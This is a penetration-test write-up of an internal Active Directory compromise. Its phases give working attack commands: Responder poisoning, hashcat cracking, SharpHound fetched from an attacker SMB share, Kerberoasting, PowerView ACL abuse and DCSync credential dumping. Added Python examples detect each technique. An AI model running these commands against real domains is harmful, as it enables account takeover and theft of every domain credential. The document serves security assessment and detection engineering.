
BloodHound path — Domain User → Service Account → Domain Admin
Engagement Context
- Scope: Internal network, full domain (no carve-outs)
- Starting position: Wired network drop, unauthenticated
- Time to Domain Admin: 4 hours 12 minutes
- Detection: Zero (confirmed post-engagement with blue team)
Phase 1 — Network Reconnaissance
```bash
# Identify live hosts
sudo nmap -sn 10.10.0.0/16 -oG hosts-alive.txt
grep "Up" hosts-alive.txt | awk '{print $2}' > live-hosts.txt
# Find domain controllers (port 88 = Kerberos, 389 = LDAP)
sudo nmap -p 88,389,445,3389 --open -iL live-hosts.txt
# Result: 10.10.1.10 (DC01), 10.10.1.11 (DC02)
```
Phase 2 — LLMNR / NBT-NS Poisoning
With no credentials yet, we listened for LLMNR broadcasts using Responder:
```bash
sudo responder -I eth0 -rdwv
# Within 8 minutes:
# [SMB] NTLMv2-SSP Hash Captured:
# jsmith::CORP:aad3b435b51404ee:...
```
Crack the NTLMv2 hash offline:
```bash
hashcat -m 5600 jsmith_hash.txt /usr/share/wordlists/rockyou.txt
# jsmith::CORP:... → Welcome1!
```
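The remediation for this phase is to disable LLMNR and NBT-NS, but the blue team also needs a way to notice a poisoner while that change rolls out. One well-known detection is a canary: periodically query LLMNR for a name that no real host has; a legitimate network never answers, so any reply identifies the poisoning host. The following is an added example (not part of the report, and not Responder's or the engagement's code) that builds the canary query and parses a reply; the canary name, transaction id and sample reply datagram are constructed for illustration, and the IP/name field shapes follow the DNS wire format that LLMNR reuses.

```python
import struct
from typing import List, Optional, Tuple

# Canary name: constructed for this example; choose something no real host is called.
CANARY_NAME = "fileshare-canary-7f3a"


def _encode_name(name: str) -> bytes:
    """DNS-style label encoding: <len><label>...<0>."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard A query: header (ID, flags=0, QDCOUNT=1) followed by one question (QTYPE=A, QCLASS=IN)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", 1, 1)


def _read_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a name at offset, following compression pointers (0xC0xx) the way DNS does."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            target, _ = _read_name(data, ptr)
            labels.append(target)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def parse_llmnr_response(data: bytes) -> Tuple[int, List[Tuple[str, str]]]:
    """Return (transaction id, [(name, IPv4)]) for the A records in an LLMNR response datagram."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:          # QR bit clear: this is a query, not a response
        return txid, []
    offset = 12
    for _ in range(qdcount):        # skip the echoed question section
        _, offset = _read_name(data, offset)
        offset += 4
    answers = []
    for _ in range(ancount):
        name, offset = _read_name(data, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return txid, answers


def check_canary_response(query_name: str, txid: int, datagram: bytes, source_ip: str) -> Optional[dict]:
    """A name that does not exist must never resolve: a matching answer means source_ip is poisoning."""
    rtxid, answers = parse_llmnr_response(datagram)
    if rtxid != txid:
        return None
    for name, ip in answers:
        if name.lower() == query_name.lower():
            return {"poisoner": source_ip, "spoofed_name": name, "resolved_to": ip}
    return None


# Constructed sample (synthetic, not a capture): a reply to the canary query, answer name as a pointer to
# the question (0xC00C), TTL 30, resolving to 10.10.5.66.
SAMPLE_TXID = 0x1234
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", SAMPLE_TXID, 0x8000, 1, 1, 0, 0)
    + _encode_name(CANARY_NAME) + struct.pack("!HH", 1, 1)
    + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes([10, 10, 5, 66])
)

if __name__ == "__main__":
    # Live use: send build_llmnr_query() to 224.0.0.252 on UDP/5355 and pass each reply to check_canary_response().
    print(check_canary_response(CANARY_NAME, SAMPLE_TXID, SAMPLE_RESPONSE, "10.10.5.66"))
```

Run this from a few sensor hosts on each VLAN on a timer and alert on any non-None result; the transaction id check keeps unrelated LLMNR traffic from producing false hits.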
Phase 3 — BloodHound Enumeration
With domain credentials we ran SharpHound to collect AD relationship data:
```
# Transfer SharpHound via SMB
impacket-smbserver share . -smb2support
# On victim:
\\attacker-ip\share\SharpHound.exe -c All --zipfilename bh-data.zip
```
BloodHound revealed a clear path:
```text
jsmith (Domain User)
→ MemberOf → IT-Helpdesk
→ GenericWrite → svc_backup (service account)
→ svc_backup has path to Domain Admin via ACL chain
```
Phase 4 — Kerberoasting
svc_backup had an SPN set — making it Kerberoastable:
```bash
impacket-GetUserSPNs CORP/jsmith:'Welcome1!' -dc-ip 10.10.1.10 -request -outputfile spn_hashes.txt
# Contents of spn_hashes.txt:
# $krb5tgs$23$*svc_backup$CORP.LOCAL$MSSQLSvc/sql01.corp.local*$...
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt
# svc_backup → Backup2023!
```
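The ticket request above lands on the domain controller as a Kerberos service ticket event (Event ID 4769) with an RC4 encryption type (the `$23$` in the hash is etype 23, 0x17), which is the signal to build the detection on. The following is an added example, not code from the report, that runs two checks over constructed 4769 records: every successful RC4 ticket for a non-machine service account (high signal in a domain whose service accounts have AES keys), and a burst of RC4 tickets for several distinct service accounts from one requester inside a short window. Field names follow the Windows event schema; all values, the window and the threshold are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC; AES128/AES256 tickets show 0x11/0x12

# Constructed 4769 records (schema field names; values synthetic).
EVENTS_4769: List[Dict[str, str]] = [
    {"time": "2024-03-01T09:00:01", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.20", "Status": "0x0"},
    {"time": "2024-03-01T09:00:02", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.20", "Status": "0x0"},
    {"time": "2024-03-01T09:00:03", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.20", "Status": "0x0"},
    # Normal AES ticket for the same service account: not flagged.
    {"time": "2024-03-01T09:01:00", "TargetUserName": "amiller@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.8.31", "Status": "0x0"},
    # Machine-account and krbtgt targets are noise for this detection.
    {"time": "2024-03-01T09:01:05", "TargetUserName": "WS01$@CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.8.40", "Status": "0x0"},
    {"time": "2024-03-01T09:01:06", "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.7.20", "Status": "0x0"},
]


def rc4_service_ticket_requests(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Successful RC4 TGS requests for non-machine, non-krbtgt service accounts.
    Where service accounts hold AES keys, each of these deserves a look on its own."""
    out = []
    for ev in events:
        svc = ev["ServiceName"]
        if (ev["TicketEncryptionType"].lower() == RC4_HMAC and ev["Status"] == "0x0"
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            out.append(ev)
    return out


def detect_kerberoast_burst(events: List[Dict[str, str]], window: timedelta = timedelta(minutes=5),
                            min_services: int = 3) -> List[dict]:
    """Flag a requester/source IP that pulled RC4 tickets for >= min_services distinct accounts inside window.
    Requesting every SPN-bearing account at once produces exactly this burst."""
    by_requester = defaultdict(list)
    for ev in rc4_service_ticket_requests(events):
        key = (ev["TargetUserName"], ev["IpAddress"])
        by_requester[key].append((datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):        # slide the window from each request
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts.append({"requester": user, "source_ip": ip,
                               "services": sorted(services), "first_seen": t0.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast_burst(EVENTS_4769):
        print(f'{a["requester"]} from {a["source_ip"]} roasted {len(a["services"])} accounts: {a["services"]}')
```

Pair the detection with the remediation in the findings table: once service accounts are gMSAs or have AES-only keys and long random passwords, an RC4 ticket for any of them becomes rare enough to alert on individually.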
Phase 5 — ACL Abuse to Domain Admin
BloodHound showed svc_backup had WriteOwner on the Domain Admins group. We leveraged this with PowerView:
```powershell
# Import PowerView
Import-Module .\PowerView.ps1
# Take ownership of Domain Admins group
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity svc_backup
# Grant svc_backup full control
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity svc_backup -Rights All
# Add jsmith to Domain Admins
Add-DomainGroupMember -Identity "Domain Admins" -Members jsmith
```
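The finding here is the ACL itself: a service account holding WriteOwner on Domain Admins, reachable from a helpdesk group through GenericWrite on that account. The findings table says to audit this with BloodHound and remove it; the following added example (not code from the report or from PowerView) shows the core of such an audit in a few dozen lines. It takes ACEs shaped like `Get-DomainObjectAcl -ResolveGUIDs` output with SIDs already resolved to names, flags takeover rights held by anyone outside an expected set of controllers, and then walks the flagged edges to list every control path from a chosen principal to Domain Admins. The ACE records, the expected-controller set and the CN-to-account mapping are assumptions for illustration.

```python
from collections import defaultdict
from typing import Dict, List, Optional

# Rights that hand the object to the holder outright (the edges BloodHound draws).
TAKEOVER_RIGHTS = {"GenericAll", "WriteOwner", "WriteDacl", "GenericWrite"}
MEMBER_ATTRIBUTE_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"   # schemaIDGUID of the 'member' attribute
ALL_PROPERTIES = "00000000-0000-0000-0000-000000000000"

DOMAIN_ADMINS_DN = "CN=Domain Admins,CN=Users,DC=corp,DC=local"

# Principals expected to control Tier-0 objects (assumption: tune per domain).
EXPECTED_CONTROLLERS = {"CORP\\Domain Admins", "CORP\\Enterprise Admins",
                        "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# Constructed ACEs mirroring the report's chain, plus benign entries that must not be flagged.
ACES: List[Dict[str, Optional[str]]] = [
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "CORP\\svc_backup",
     "AceType": "AccessAllowed", "Rights": "WriteOwner", "ObjectAceType": None},
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "CORP\\Domain Admins",
     "AceType": "AccessAllowed", "Rights": "GenericAll", "ObjectAceType": None},
    {"ObjectDN": "CN=svc_backup,CN=Users,DC=corp,DC=local", "Identity": "CORP\\IT-Helpdesk",
     "AceType": "AccessAllowed", "Rights": "GenericWrite", "ObjectAceType": None},
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "CORP\\IT-Helpdesk",
     "AceType": "AccessAllowed", "Rights": "WriteProperty", "ObjectAceType": MEMBER_ATTRIBUTE_GUID},
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "NT AUTHORITY\\Authenticated Users",
     "AceType": "AccessAllowed", "Rights": "ReadProperty, GenericExecute", "ObjectAceType": None},
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "CORP\\jdoe",            # write to a harmless attribute
     "AceType": "AccessAllowed", "Rights": "WriteProperty", "ObjectAceType": "11111111-2222-3333-4444-555555555555"},
    {"ObjectDN": DOMAIN_ADMINS_DN, "Identity": "CORP\\jdoe",            # deny ACEs grant nothing
     "AceType": "AccessDenied", "Rights": "GenericAll", "ObjectAceType": None},
]


def audit_aces(aces, expected=EXPECTED_CONTROLLERS) -> List[dict]:
    """Return one finding per allow-ACE that gives an unexpected principal control of the object."""
    findings = []
    for ace in aces:
        if ace["AceType"] != "AccessAllowed" or ace["Identity"] in expected:
            continue
        rights = {r.strip() for r in ace["Rights"].split(",")}
        reason = None
        takeover = rights & TAKEOVER_RIGHTS
        if takeover:
            reason = ", ".join(sorted(takeover))
        elif "WriteProperty" in rights and ace["ObjectAceType"] in (None, ALL_PROPERTIES, MEMBER_ATTRIBUTE_GUID):
            # Unscoped WriteProperty covers every attribute; scoped to 'member' it means adding group members.
            reason = "WriteProperty(member)" if ace["ObjectAceType"] == MEMBER_ATTRIBUTE_GUID else "WriteProperty(all)"
        if reason:
            findings.append({"object": ace["ObjectDN"], "identity": ace["Identity"], "reason": reason})
    return findings


def _dn_to_identity(dn: str, domain: str = "CORP") -> str:
    """Map 'CN=svc_backup,CN=Users,...' to 'CORP\\svc_backup' (assumes CN equals sAMAccountName)."""
    return f"{domain}\\{dn.split(',', 1)[0][3:]}"


def control_paths(findings: List[dict], start: str, target_dn: str) -> List[List[str]]:
    """Depth-first walk over the flagged edges; returns every chain from start that reaches target_dn."""
    edges = defaultdict(list)
    for f in findings:
        edges[f["identity"]].append(f["object"])
    paths, stack = [], [(start, [start])]
    while stack:
        ident, path = stack.pop()
        for obj in edges.get(ident, []):
            if obj == target_dn:
                paths.append(path + [obj])
            else:
                nxt = _dn_to_identity(obj)
                if nxt not in path:                  # avoid cycles
                    stack.append((nxt, path + [nxt]))
    return paths


if __name__ == "__main__":
    found = audit_aces(ACES)
    for f in found:
        print(f'{f["identity"]} has {f["reason"]} on {f["object"]}')
    for p in control_paths(found, "CORP\\IT-Helpdesk", DOMAIN_ADMINS_DN):
        print(" -> ".join(p))
```

Every finding printed is an ACE to remove; the second loop shows that removing only svc_backup's WriteOwner would leave the helpdesk group with a direct route through `member`, which is why the table calls for a full audit rather than a single fix.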
Phase 6 — DCSync (Credential Dumping)
With Domain Admin rights, we ran DCSync to extract all domain hashes:
```bash
impacket-secretsdump CORP/jsmith:'Welcome1!'@10.10.1.10 -just-dc-ntlm
# Output:
# CORP\Administrator:500:aad3b435:31d6cfe0d16ae931b73c59d7e0c089c0:::
# CORP\krbtgt:502:aad3b435:b38c2a7ff5a53e5ac1d3ab67f3e6b0a1:::
```
With the krbtgt hash, persistence via Golden Ticket is trivial.
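DCSync is one of the easier steps in this chain to catch: replication is a control-access right on the domain object, and with "Audit Directory Service Access" enabled the DC logs a 4662 whose Properties list the replication rights GUIDs. Only domain controllers and a short list of sync accounts should ever exercise them. The following added example (not code from the report or from Impacket) runs that rule over constructed 4662 records; the DC account names come from the report's DC01/DC02, while the sync-account allowlist, the object GUID and the event values are assumptions for illustration.

```python
import re
from typing import Dict, List

GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")

# Extended rights that directory replication requires, keyed by rightsGuid.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS_MASK = "0x100"          # ADS_RIGHT_DS_CONTROL_ACCESS in the 4662 AccessMask field
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"

# Assumptions for this example: the report's two DCs, plus one directory-sync account allowed to replicate.
DOMAIN_CONTROLLER_ACCOUNTS = {"DC01$", "DC02$"}
ALLOWED_REPLICATORS = {"svc_dirsync"}

DOMAIN_OBJECT = "%{a1b2c3d4-0000-4000-8000-0000000000aa}"   # constructed object GUID of the domain head


def _props(guids: List[str]) -> str:
    """Render GUIDs the way the 4662 Properties field lists them, one per line in braces."""
    return "\n".join(f"\t{{{g}}}" for g in guids)


REPL = [k for k in REPLICATION_RIGHTS if not k.startswith("89e95b76")] + [DOMAIN_DNS_CLASS]

# Constructed 4662 records (schema field names; values synthetic).
EVENTS_4662: List[Dict[str, str]] = [
    {"time": "2024-03-01T13:40:02", "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": DOMAIN_OBJECT, "Properties": _props(REPL)},       # normal replication
    {"time": "2024-03-01T13:42:17", "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": DOMAIN_OBJECT, "Properties": _props(REPL)},       # a user replicating
    {"time": "2024-03-01T13:42:30", "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "AccessMask": "0x10", "ObjectName": "CN=amiller,CN=Users,DC=corp,DC=local",
     "Properties": _props([USER_CLASS])},                                                    # plain property read
    {"time": "2024-03-01T13:45:00", "SubjectUserName": "svc_dirsync", "SubjectDomainName": "CORP",
     "AccessMask": "0x100", "ObjectName": DOMAIN_OBJECT, "Properties": _props(REPL)},       # allowlisted sync
]


def detect_dcsync(events: List[Dict[str, str]]) -> List[dict]:
    """Flag control-access operations that use replication rights from anything other than a DC or allowlisted account."""
    hits = []
    for ev in events:
        if ev["AccessMask"].lower() != CONTROL_ACCESS_MASK:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev["Properties"])}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if not rights:
            continue
        who = ev["SubjectUserName"]
        if who in DOMAIN_CONTROLLER_ACCOUNTS or who in ALLOWED_REPLICATORS:
            continue
        hits.append({"time": ev["time"], "subject": f'{ev["SubjectDomainName"]}\\{who}',
                     "rights": rights, "object": ev["ObjectName"]})
    return hits


if __name__ == "__main__":
    for h in detect_dcsync(EVENTS_4662):
        print(f'{h["time"]} {h["subject"]} used {", ".join(h["rights"])} on {h["object"]}')
```

Keep the allowlist deliberately short and reviewed: a sync account that can replicate secrets is itself a Tier-0 asset, and a non-DC machine account (WS01$ style) performing replication should fire just as a user account does.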
Key Findings Summary
| Finding | Risk | Remediation |
|---|---|---|
| LLMNR/NBT-NS enabled | High | Disable via GPO |
| Weak user passwords | High | Enforce complexity + MFA |
| Kerberoastable service accounts | High | Use gMSA, long random passwords |
| Dangerous ACLs on DA group | Critical | Audit with BloodHound, remove |
| No EDR / alerting | Critical | Deploy MDR/EDR on all endpoints |